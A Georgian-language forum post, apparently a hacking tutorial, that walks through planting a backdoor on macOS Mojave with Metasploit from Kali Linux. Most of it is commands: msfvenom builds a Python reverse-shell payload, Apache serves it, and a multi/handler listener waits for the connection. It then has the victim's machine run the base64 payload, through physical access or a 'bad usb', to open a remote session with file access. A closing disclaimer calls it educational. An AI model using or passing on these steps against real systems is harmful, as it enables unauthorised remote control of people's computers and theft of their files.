გამარჯობათ დღესდღეისობით ძაან ბევრი ადმიანსიგან მესმის რომ Mac OS X არის ყველაზე უსაფრთხო სისტემა. მაგრამ რატომ? ძირითადი არგუმენტი არის ის რომ Mac OS აქვს დახურული ფაილური სისტემა ხოლო Windows კი გახსნილი, რაც ნიშნავს იმას რომ ბოროტმოქმედს შეუძლია ყველა სისტემური ფაილი გახსნას დაარედაქტიროს და მოდიფიცირება გუაკეთოს. მე გაჩვენებთ თუ როგორ არის შესაძლებელი ბექდორის შექმნა მაკის სისტემაში ტერმინალის მეშვეობით.
ბექდორის შესაქმნელად გამოვიყენებთ ყველასთვის ცნობილ და საყვარელ შეღწევადობის ფრაემვორკს Metasploit ს რომელი გვეყენება Kali Linux ზე. მსხვერპლის სახით გვეყოლება macOS Mojave ვერსიით 10.14.4 ჩემს მაკბუკზე . ხოლო შემტევი იქნება Kali Linux ი ვირტუალ ბოხზსე დაყენებული. დაინფიცირება მოხდება შელლ ბრძანებით რომელიც პითონში იქნება დაწერილი. წარმატებული დაინფიცირების შედეგად ჩვენ წვდომა გვექნება ფაილურ სისტემაზე ასევე შევძლებთ ექსპლოატირებს ნებისმიერ რამის და ფაილების ჩატვირთვა ამოტვირთვის ფუნქციაც გვექნება.
1) გავუშვათ მეტასპლოიტი
Bash:
msfconsole
2)
Bash:
use exploit/multi/handler
3) ვქმნით ექსპლოიტს და ვუთითებთ ჩვენს IPv4
Bash:
msfvenom -p cmd/unix/reverse_python LHOST=YOUR IP LPORT=9090 -f rar > /root/shell.py
4) ჩვენთვის მოსახერხებლად რომ იყოს ვუშვებთ apache ის სერვერს
Bash:
service apache2 start
5) გადავიტანოთ shell.py აპაჩში
Bash:
cp shell.py /var/www/html
6) ვაკონფიგურირებთ მეტასპლოიტს ჩვენი ვირუსისთვის და ვუშვებთ.
Bash:
set payload cmd/unix/reverse_python
set LHOST YOUR IPv4
set LPORT 9090
run
7) თუ თქვენ გაქვთ მსხვერპლის კომპიუტერთან წვდომა გახსენით safari ი და გადადით დაგენერირებულ მისამართზე ხოლო თუ არ გაქვთ წვდომა გამოიყენეთ bad usb
8) ვხსნით shell.py ის ფაილს
9) ვხედავთ გაურკვეველ ციფრებს და ასოებს base64 ფორმატში, ვაკოპირებთ და ვსვავთ ტერმინალში
10)და ვხედავთ რომ გამოჩნდა დაინფიცირებული სესია
11) ფუნქციონალი თვენს ხელთაა რომ გაიგოთ რომელ დირქტორიაში იმყოფებით ვწერთ pwd ხოლო ფაილების გასაგებად ls
მადლობა ყურადღებისთვის
სტატია დაწერილია შემეცნებითი მიზნებისთვის ფორუმი და ავტორი არ არის პასუხისმგებელი მის ბოროტულად გამოყენების შემთხვევაში
Last edited: